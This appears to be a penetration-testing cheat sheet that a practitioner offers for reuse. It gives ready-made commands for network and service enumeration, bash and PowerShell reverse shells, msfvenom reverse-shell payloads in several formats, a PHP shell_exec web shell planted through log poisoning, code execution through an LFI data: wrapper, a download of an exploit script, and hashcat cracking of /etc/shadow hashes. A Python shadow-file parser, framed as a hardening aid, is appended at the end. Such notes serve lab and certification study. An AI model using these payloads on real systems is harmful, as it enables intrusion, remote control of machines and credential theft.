Pentest Toolkit
This is where my cheatsheets and tools will be held. Feel free to fork and use as you wish.
Recon
Port Scanning
nmap
nmap -sn 10.10.1.0/24
network sweep to find hosts.
nmap -sn 10.10.1.0/24 -oG - | awk '/Up$/{print $2}' > list_ips.txt
sweep the network for IPs that are up, and save the IP addresses to a list.
nmap -A 10.1.1.56
for a quick scan of common TCP ports with OS and service detection.
nmap -A 10.1.1.56 -p-
to scan all TCP ports with OS and service detection.
nmap -A -sU 10.1.1.56
to scan the most common UDP ports with OS and service detection (add -p- for all of them).
sudo nmap -O -A -sV 10.1.1.56
to scan the common TCP ports, fingerprint the OS, run scripts and grab banners.
Netcat
The -w flag specifies the timeout in seconds and the -z flag sends zero data (for scanning).
nc -nvv -w 1 -z 10.11.1.220 3388-3390
TCP scan from ports 3388-3390.
nc -nv -u -z -w 1 10.11.1.115 160-162
UDP scan from ports 160-162.
Directory Enumeration
dirsearch is a favorite; dirbuster and nikto are classic methods.
Useful wordlists on Kali
kali@kali:~/Tools/dirsearch$ ls /usr/share/wordlists
dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt rockyou.txt.gz wfuzz
kali@kali:~/Tools/dirsearch$ ls /usr/share/seclists
Discovery Fuzzing IOCs Miscellaneous Passwords Pattern-Matching Payloads README.md Usernames Web-Shells
kali@kali:~/Tools/dirsearch$
python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirb/big.txt -r
directory enum with dirb's big.txt; copy/paste and just change the IP/URL and extensions.
python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r
directory enum with dirbuster's directory list; copy/paste and just change the IP/URL and extensions.
python3 dirsearch.py -u http://10.11.1.71 -t 100 -e cgi -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -r
brute force CGIs.
SMB Enumeration
Manual
smbclient -L 10.11.1.146
To list available shares
smbclient //10.11.1.146/IPC$
to login to that share. If that doesn't work, try to sudo... sudo smbclient //10.11.1.146/IPC$
Automated
enum4linux 10.11.1.146 -a -o
to use enum4linux to automate SMB enumeration.
SNMP Enumeration
onesixtyone -c community -i ips
scan the target network to identify SNMP servers, where community and ips are list files; the community list holds candidate strings such as public, private and manager.
snmp-check 10.11.1.227
does everything below, but better and formats it for you nicely :)
snmpwalk -c public -v1 -t 10 10.11.1.115
enumerate entire MIB tree.
snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25
enumerate Windows users.
snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2
enumerate Windows running processes.
snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.6.13.1.3
enumerate open TCP ports.
snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2
enumerate installed software.
Reverse Shells
Bash
/bin/bash -i >& /dev/tcp/192.168.119.137/1337 0>&1
PowerShell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.137',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Listeners
Netcat
nc -lvp 4444
listen (catch) reverse shell with Netcat on port 4444
Spawn TTY Shell
python -c 'import pty; pty.spawn("/bin/bash")'
MSFVenom
ASP
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f asp > shell.asp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f war > shell.war
JSP
This also works for Cold Fusion instead of the crazy web shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f raw > shell.jsp
Linux Binary
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.133 LPORT=443 -f elf > shell.elf
Shell Code
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
encode around bad characters, Windows shell.
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 -b "\x00\x20" -f py -v shellcode
Linux, with Python output as an option.
Privilege Escalation
Linux
sudo -l
check if there's anything interesting, like running scripts as other users with NOPASSWD: ALL.
Distro Version
cat /etc/issue
Kernel Version and Architecture
uname -r
arch
Find Writable Directories
find / -writable -type d 2>/dev/null
View SUID Binaries
find / -perm -u=s -type f 2>/dev/null
Processes Running
ps axu
Check Services Listening
ss -lnpt
Cron Jobs
ls -la /etc/cron.d
prints cron jobs which are already present in cron.d
Windows
powershell -c "Invoke-WebRequest -Uri http://10.10.14.10/39719.ps1 -OutFile ./39719.ps1"
File transfer for dummies
systeminfo
to get good info.
tasklist /SVC
to view running services.
Finding Kernel Exploits
Cross Compile Exploits
i686-w64-mingw32-gcc shell.c -o shell.exe
32-bit Windows
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
32-bit Windows, linking the Winsock library.
x86_64-w64-mingw32-gcc 271.c -o 271.exe
64-bit Windows
Buffer Overflow
Bad Characters
# every byte from \x01 to \xff; \x00 is left out because the null byte is assumed bad
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
Locate EIP
msf-pattern_create -l 2196
generate unique pattern to overflow the stack.
msf-pattern_offset -l 2196 -q 72433372
locate the offset of the value found in EIP at crash time.
msf-nasm_shell (Generate Opcodes)
kali@kali: ~$ msf-nasm_shell
nasm > add eax,12
00000000 83C00C add eax,byte +0xc
nasm > JMP EAX
00000000 FFE0 jmp eax
nasm >
Web Application Exploits
LFI (Local File Inclusion)
Contaminating Log Files
Write PHP code into the log file so that shell commands can be executed through the include
kali@kali:~$ nc -nv 10.11.0.22 80
(UNKNOWN) [10.11.0.22] 80 (http) open
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig
call the URL with the LFI and the cmd GET parameter.
RFI (Remote File Inclusion)
PHP Wrappers
http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
to execute arbitrary PHP code.
Password Cracking
/etc/shadow
Hash algorithm cheat sheet, using the entry bob:$1$Rrhb4lzg$Ee8/JYZjv.NimwyrSEL6R/:16903:0:99999:7:::
- $1$ is MD5 (md5crypt)
- $2a$ is Blowfish
- $2y$ is Blowfish
- $5$ is SHA-256
- $6$ is SHA-512
The salt is Rrhb4lzg
The hash is Ee8/JYZjv.NimwyrSEL6R/
Crack via hashcat
- Create hashfile: save $1$Rrhb4lzg$Ee8/JYZjv.NimwyrSEL6R/ as bob.hash
- Examples
hashcat -m 500 -a 0 bob.hash /usr/share/wordlists/rockyou.txt --force
for $1$
hashcat -m 1800 -a 0 bob.hash /usr/share/wordlists/rockyou.txt --force
for $6$
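As an added example (not part of this cheatsheet), a small Python parser that splits /etc/shadow entries into algorithm id, salt and digest using the prefix table above, maps $1$ and $6$ to the hashcat modes listed, and flags accounts still hashed with md5crypt so a hardening review can catch them; all sample entries except bob's are constructed.

```python
from dataclasses import dataclass
from typing import List, Optional

# crypt(3) prefixes and the algorithm each one denotes, as on the cheat sheet.
ALGORITHMS = {"1": "MD5 (md5crypt)", "2a": "Blowfish (bcrypt)",
              "2y": "Blowfish (bcrypt)", "5": "SHA-256", "6": "SHA-512"}
# hashcat -m values used on the cheat sheet (md5crypt and sha512crypt).
HASHCAT_MODES = {"1": 500, "6": 1800}
# Constructed sample file; only bob's line is the cheat sheet's own example.
SAMPLE_SHADOW = """\
bob:$1$Rrhb4lzg$Ee8/JYZjv.NimwyrSEL6R/:16903:0:99999:7:::
alice:$6$rounds=5000$saltsalt$hashhashhash:18000:0:99999:7:::
carol:$2y$10$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
"""

@dataclass
class ShadowEntry:
    user: str
    algorithm: str
    salt: str
    digest: str
    hashcat_mode: Optional[int]  # None when the cheat sheet lists no mode

def parse_shadow_line(line: str) -> Optional[ShadowEntry]:
    """Return the parsed entry, or None for locked/passwordless accounts."""
    user, field = line.rstrip("\n").split(":", 2)[:2]
    if field in ("", "*") or field.startswith("!"):
        return None
    parts = field.split("$")  # ['', id, ...]
    if len(parts) < 3 or parts[0] != "" or parts[1] not in ALGORITHMS:
        raise ValueError(f"{user}: unrecognised hash format {field!r}")
    ident, rest = parts[1], parts[2:]
    if ident.startswith("2"):
        # bcrypt: $2y$cost$ then 22 salt chars immediately followed by the digest
        blob = rest[1]
        salt, digest = blob[:22], blob[22:]
    else:
        if rest[0].startswith("rounds="):
            rest = rest[1:]  # optional rounds=N field for $5$/$6$
        salt, digest = rest[0], rest[1]
    return ShadowEntry(user, ALGORITHMS[ident], salt, digest, HASHCAT_MODES.get(ident))

def weak_hash_users(shadow_text: str) -> List[str]:
    """Accounts still on md5crypt, the format a hardening review should flag."""
    return [e.user for e in map(parse_shadow_line, shadow_text.splitlines())
            if e is not None and e.algorithm.startswith("MD5")]
```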